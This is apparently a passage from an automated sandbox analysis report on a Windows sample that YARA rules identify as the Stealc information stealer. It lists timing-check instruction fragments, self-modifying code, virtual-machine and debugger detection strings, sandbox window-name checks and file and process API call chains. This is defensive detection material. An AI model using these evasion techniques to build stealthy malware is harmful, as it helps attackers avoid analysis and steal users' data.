              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0023 second address: DA002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0444 second address: DA0450 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0450 second address: DA0483 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F055D0637C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F055D0637BEh 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push ebx 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0483 second address: DA0488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0488 second address: DA048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA048E second address: DA0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0494 second address: DA0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0498 second address: DA04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Dh 0x00000007 jno 00007F055C7C8326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F055C7C8337h 0x00000015 jmp 00007F055C7C832Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0628 second address: DA062C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0791 second address: DA07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F055C7C8326h 0x0000000a pop ecx 0x0000000b jmp 00007F055C7C832Bh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA07A7 second address: DA07D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F055D0637C4h 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007F055D0637BAh 0x0000000f jmp 00007F055D0637BBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA07D7 second address: DA07DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA07DD second address: DA0800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F055D0637C2h 0x0000000f jne 00007F055D0637B6h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA095A second address: DA095F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA095F second address: DA0964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0964 second address: DA0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0972 second address: DA0988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F055D0637B6h 0x0000000a jmp 00007F055D0637BBh 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0988 second address: DA0998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F055C7C8326h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0998 second address: DA099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA099E second address: DA09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3C01 second address: DA3C06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4E48 second address: DA4E79 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C832Eh 0x00000008 jp 00007F055C7C832Ch 0x0000000e jne 00007F055C7C8326h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jno 00007F055C7C832Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6B7B second address: DA6B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6B7F second address: DA6B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6B85 second address: DA6B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B902A1 second address: 4B902BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B902BE second address: 4B90305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dh, 00h 0x0000000e mov di, si 0x00000011 popad 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F055D0637BCh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F055D0637C7h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B903C0 second address: 4B903E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F055C7C8334h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B903E3 second address: 4B903E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B903E9 second address: 4B903FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055C7C832Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B903FA second address: 4B903FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B903FE second address: 4B90414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, 1F95h 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90414 second address: 4B90452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F055D0637BDh 0x00000014 xor ch, FFFFFFD6h 0x00000017 jmp 00007F055D0637C1h 0x0000001c popfd 0x0000001d mov esi, 3C7FEA47h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90452 second address: 4B90492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F055C7C8333h 0x00000009 xor al, 0000000Eh 0x0000000c jmp 00007F055C7C8339h 0x00000011 popfd 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90492 second address: 4B90496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B90496 second address: 4B9049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFFFE second address: CC001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C9h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC001C second address: CC0031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jno 00007F055C7C8326h 0x00000014 pop edi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0031 second address: CC0037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B0F9C1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CADD2A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D398E1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-30053
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-28863
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.5 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008DE330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008D3CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DCCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008DCCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008D1C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C15A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008C15A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C15B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_008C15B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008D15C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CDD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008CDD70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008D4EC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008DD640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DDE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_008DDE50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_008D2730
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_008D2749
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E3190 GetSystemInfo,wsprintfA,0_2_008E3190
              Source: file.exe, file.exe, 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747032810.0000000000593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-28733
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4980 VirtualProtect 00000000,00000004,00000100,?0_2_008C4980
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E63C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E63C0 mov eax, dword ptr fs:[00000030h]0_2_008E63C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_008E29E0
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E46C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_008E46C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E4630 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_008E4630
              Source: file.exe, file.exe, 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: aProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_008E2D00
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E2B00 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_008E2B00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_008E29E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E2BB0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_008E2BB0

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
